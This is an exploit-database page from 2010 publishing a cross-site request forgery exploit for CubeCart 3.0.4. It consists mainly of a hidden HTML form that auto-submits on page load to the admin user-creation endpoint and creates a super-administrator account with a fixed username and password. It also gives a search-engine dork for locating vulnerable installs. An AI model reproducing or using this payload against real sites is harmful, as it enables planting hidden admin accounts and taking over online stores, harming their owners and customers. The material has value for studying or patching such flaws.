[webapps / 0day] - CubeCart 3.0.4 <= CSRF Add Admin
Posted on 24 December 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>CubeCart 3.0.4 <= CSRF Add Admin | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='CubeCart 3.0.4 <= CSRF Add Admin by P0C T34M in webapps / 0day | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>================================ CubeCart 3.0.4 <= CSRF Add Admin ================================ #Script : CubeCart 3.0.4 #Language : Php #Download : http://www.cubecart.com/ #Date : 2010/12/24 #Version : 3.0.4 #Dork : "Powered by CubeCart 3.0.4" #Found : by P0C T34M >> tnt-r00t #Homepage : www.p0c.cc <form name="p0c" action="http://127.0.0.1/cc/admin/adminusers/administrators.php?mode=new" method="post"> <input name="name" type="hidden" value="myname"/ > <input name="adminUsername" type="hidden" value="r00t" /> <input name="email" type="hidden" value="myemail@hotmail.com"> <input name="adminPassword" type="hidden" value="t00r" /> <input name="isSuper" type="hidden" value="1" checked="checked" type="radio"/> <input name="adminId" value="" type="hidden"/> <input name="Submit" type="hidden" class="submit" value="Add User" type="submit"/> </form> <script>document.p0c.submit();</script> NICKNAME: P0C T34M # <a href='http://1337db.com/'>1337db.com</a> [2010-12-24]</pre></body></html>